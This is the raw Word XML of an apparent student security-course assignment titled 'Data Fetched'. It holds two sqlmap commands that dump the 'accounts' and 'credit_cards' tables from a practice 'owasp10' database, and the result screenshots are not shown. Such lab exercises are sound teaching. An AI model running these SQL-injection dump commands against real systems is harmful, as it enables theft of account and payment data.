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60C6" w14:textId="77777777" w:rsidR="00B8617C" w:rsidRDefault="00B8617C"/>
    <w:p w14:paraId="30462458" w14:textId="0B517FCA" w:rsidR="00B8617C" w:rsidRPr="00B8617C" w:rsidRDefault="00B8617C" w:rsidP="00B8617C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8617C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“sqlmap -r /root/Desktop/extract.txt -D owasp10 -T accounts --dump”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3892D0" w14:textId="50A01677" w:rsidR="00757806" w:rsidRDefault="00B8617C">
      <w:r w:rsidRPr="00B8617C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73AD85D5" wp14:editId="3F5B123A">
            <wp:extent cx="594360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A1E8" w14:textId="7467C8E1" w:rsidR="00B8617C" w:rsidRDefault="00B8617C"/>
    <w:p w14:paraId="4C925826" w14:textId="254C7FC0" w:rsidR="00B8617C" w:rsidRDefault="00B8617C"/>
    <w:p w14:paraId="02CDA958" w14:textId="37368B14" w:rsidR="00B8617C" w:rsidRDefault="00B8617C">
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8617C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8617C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“sqlmap -r /root/Desktop/extract.txt -D owasp10 -T </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>credit_cards</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8617C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --dump”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7907B958" w14:textId="31DE5EB5" w:rsidR="00B8617C" w:rsidRDefault="00B8617C">
      <w:r w:rsidRPr="00B8617C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AE41554" wp14:editId="5B130D9B">
            <wp:extent cx="3892750" cy="20067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184C" w14:textId="3C57068B" w:rsidR="00B8617C" w:rsidRDefault="00B8617C"/>
    <w:p w14:paraId="0BC5F1C7" w14:textId="77777777" w:rsidR="00B8617C" w:rsidRDefault="00B8617C"/>
    <w:sectPr w:rsidR="00B8617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8ACC0" w14:textId="77777777" w:rsidR="00E85978" w:rsidRDefault="00E85978" w:rsidP="00B8617C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5420B48A" w14:textId="77777777" w:rsidR="00E85978" w:rsidRDefault="00E85978" w:rsidP="00B86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25C84" w14:textId="77777777" w:rsidR="00E85978" w:rsidRDefault="00E85978" w:rsidP="00B8617C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2301FC92" w14:textId="77777777" w:rsidR="00E85978" w:rsidRDefault="00E85978" w:rsidP="00B86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DAF39" w14:textId="77777777" w:rsidR="00B8617C" w:rsidRDefault="00B8617C" w:rsidP="00B8617C">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Name</w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve">: </w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve">Rifa Salman                                                                                                                </w:t>
    </w:r>
    <w:r>
      <w:t>Roll No.:</w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>22-10067</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="18B80051" w14:textId="70B497D6" w:rsidR="00B8617C" w:rsidRDefault="00B8617C" w:rsidP="00B8617C">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r w:rsidRPr="00604219">
      <w:t>COMP</w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>421</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">                           </w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">               </w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>Assignment</w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>: Data Fetched</w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve">                               </w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">Section: </w:t>
    </w:r>
    <w:r w:rsidRPr="00604219">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>B</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="24564E6C" w14:textId="77777777" w:rsidR="00B8617C" w:rsidRDefault="00B861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7C"/>
    <w:rsid w:val="00757806"/>
    <w:rsid w:val="00B8617C"/>
    <w:rsid w:val="00E8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ED1C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F6CAA0F1-A0D4-498C-86F0-C5DD83F0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17C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B86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17C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B86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 Salman</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rifa Salman</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-15T18:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-15T18:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>